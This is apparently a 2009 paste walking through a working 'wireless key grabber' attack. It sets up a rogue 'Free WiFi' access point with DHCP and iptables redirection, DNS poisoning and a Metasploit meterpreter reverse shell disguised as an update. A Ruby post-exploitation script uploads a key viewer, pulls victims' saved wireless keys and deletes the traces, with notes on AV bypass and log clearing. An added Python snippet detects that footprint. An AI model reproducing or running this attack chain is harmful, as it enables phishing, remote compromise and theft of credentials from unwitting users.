hm2075
Jul 25th, 2009
Wireless Key grabber -- how the script works
hm2075@hotmail.com
for bt4 pre final

# Copying dhcpd.conf
The first stage is copying the dhcpd.conf to its correct location.
Here is a peek at the dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.0;
option domain-name "example.com";
option domain-name-servers 10.0.0.1;
range dynamic-bootp 10.0.0.16 10.0.0.55;
#range 10.0.0.20 10.0.0.50;

}

# FakeAP
modprobe tun is required
airmon-ng start interface   --- this sets your interface into monitor mode
airbase-ng -e "Free WiFi" mon0 -v   ------ this starts a standard AP on mon0

# Getting metasploit ready
"Loading Metasploit with hb.rc"
./msfconsole -r /root/WK/hb.rc &

Let's have a look at hb.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp      --- I created the meterpreter.exe earlier on port 28, i.e. our fake update exe
set LHOST 10.0.0.1
set LPORT 28
set AutoRunScript /root/WK/hb.rb           ----- this is the script we want to run once the meterpreter.exe is loaded by the victim
set ExitOnSession false     ----- we don't want to exit
show options
exploit -j

We shall have a quick look at hb.rb

# Wireless key harvester using wireless key viewer
require 'rex'
# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")

# bin -- the name of our exe
bin = "wkv.exe"

# output of wireless key viewer -------- we want our txt file name to be random otherwise it will get overwritten
out  = Rex::Text.rand_text_alpha_upper(5) + ".txt"

#destination for the keys in txt format
dest = "/root/WK/keys/"
#

#
#upload wireless key viewer --- modify it to bypass av's
#

#
print_status("Uploading Wireless Key Viewer")
#
sleep(1)
# We upload our file to go into system drive not c: because some can be D: etc etc
client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/root/WK/wkv.exe")
#
sleep(1)
#
print_status("Uploaded Wireless Key Viewer")
#
sleep(1)
#
#execute via cmd, output will be random name,
#
print_status("Executing wireless key viewer ")
# We execute here
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stext /#{out}", nil, {'Hidden' => 'false'})
#
print_status("wkv file executed")
#
sleep(1)
#

#
#download keys to our keys folder
# and we download keys here
print_status("Downloading keys to keys folder ")
#
client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
#
print_status("Downloaded keys to keys folder ")
#

#

#
#delete uploaded files -- we can also clear logs here if we want to
# and then we delete what we have done, i.e. delete wkv.exe and the txt file
sleep(1)
#
print_status("Deleting uploaded files ")
#
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
#
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
#
print_status("Have a nice day!!!!!! ")

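As an added detection-side example (not part of the original paste), the following Python flags the host footprint the hb.rb script above leaves behind: an executable sitting in the drive root launched with the /stext save-to-text switch, followed shortly by a del of the same file. The event records and command lines are constructed in Sysmon process-creation style; field names, hosts and timestamps are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry).
# WS01 mirrors the command lines hb.rb issues; WS02 is benign noise.
EVENTS = [
    {"host": "WS01", "ts": 100, "cmdline": "cmd.exe /c %SystemDrive%\\wkv.exe /stext /QZLPA.txt"},
    {"host": "WS01", "ts": 101, "cmdline": "C:\\wkv.exe /stext /QZLPA.txt"},
    {"host": "WS01", "ts": 103, "cmdline": "cmd.exe /c del %SystemDrive%\\wkv.exe "},
    {"host": "WS01", "ts": 104, "cmdline": "cmd.exe /c del %SystemDrive%\\QZLPA.txt "},
    {"host": "WS02", "ts": 200, "cmdline": "cmd.exe /c dir C:\\Users"},
    {"host": "WS02", "ts": 201, "cmdline": "C:\\Program Files\\Tool\\tool.exe /stext C:\\Temp\\report.txt"},
]

# A file with an extension directly in the drive root, written either as
# %SystemDrive%\name.ext or X:\name.ext; deeper paths do not match.
ROOT_FILE = re.compile(r'(?:%SystemDrive%|\b[A-Za-z]:)\\([^\\\s"]+\.[A-Za-z0-9]+)(?=[\s"]|$)', re.I)
STEXT = re.compile(r"(?:^|\s)/stext(?:\s|$)", re.I)   # save-to-text switch used on the page
DEL_CMD = re.compile(r"\bdel\b", re.I)

def root_files(cmdline):
    """Lower-cased base names of drive-root files referenced in a command line."""
    return {m.group(1).lower() for m in ROOT_FILE.finditer(cmdline)}

def detect(events, window=60):
    """Alert per process that runs a drive-root .exe with /stext; note whether the
    same host deletes drive-root files (the exe among them) within `window` seconds."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            roots = root_files(e["cmdline"])
            exes = [f for f in roots if f.endswith(".exe")]
            if not (exes and STEXT.search(e["cmdline"])):
                continue
            deleted = [f for later in evs[i + 1:]
                       if later["ts"] - e["ts"] <= window and DEL_CMD.search(later["cmdline"])
                       for f in root_files(later["cmdline"])]
            alerts.append({"host": host, "ts": e["ts"], "exe": exes[0],
                           "cleanup": exes[0] in deleted, "deleted": sorted(set(deleted))})
    return alerts

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```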
# Setting up iptables and dhcp server
echo "Setting up IPTABLES"
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
sleep 2
/etc/init.d/dhcp3-server restart
echo "IPTABLES updated and dhcp server started"
sleep 2

#start webserver  --- I prefer lighttpd because I can use a custom conf file to change the location of the index.html
echo "starting webserver"
/etc/init.d/lighttpd stop
sleep 2
lighttpd -f '/root/WK/lighttpd.conf'
sleep 2
echo "Web server started"
sleep 2

#start dns poison   ---- this is straightforward, we just redirect our victims to our exploit page
echo "Starting dns redirector"
sleep 2
cd /
cd root/WK
xterm -geometry 75x15+500+0 -T DNSPoison -e java ServerKernelMain 10.0.0.1 10.0.0.1&
echo "DNS poison started, check DNS poison if victims are being redirected to our webserver"

sleep 2

echo "Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited"

sleep 2

echo "Opening WKV folder, keys will be uploaded in here"
sleep 2
konqueror --geometry 605x305+500+500 --select /root/WK/keys/
